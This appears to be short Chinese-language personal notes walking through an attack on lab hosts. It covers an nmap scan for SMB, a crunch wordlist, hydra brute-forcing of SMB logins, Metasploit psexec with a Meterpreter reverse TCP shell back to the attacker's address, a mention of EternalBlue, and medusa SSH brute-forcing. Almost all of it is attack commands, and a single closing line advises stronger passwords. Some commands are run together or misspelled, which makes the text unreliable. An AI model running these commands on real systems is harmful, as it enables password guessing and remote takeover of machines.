工具hydua、nmap
使用nmap扫描是否开启smb服务即445端口
nmap -O 172.168.172.131
发现开启,制作字典passwd.txt
crunch 1 4 1234 -o passwd .txt
hydra -l hack -P passwd.txt smb://172.168.172.131 -f -vV
密码爆破成功
启动msf
使用模块:
user exploit/windows/smb/psexec_pshset payload windows/meterpreter/reverse_tcp
show options
set rhost 172.168172.131set smb pass 123set smbuser hackset lhost 172.168.172.15
使用exploit(windows/smb/ms17_010_eternalblue)攻击win2008等都是把他们打重启,醉了。
ssh爆破
medusa -M ssh -h 172.168.172.139 -u root -P passwd.dic
所以最好别设置太简单的密码
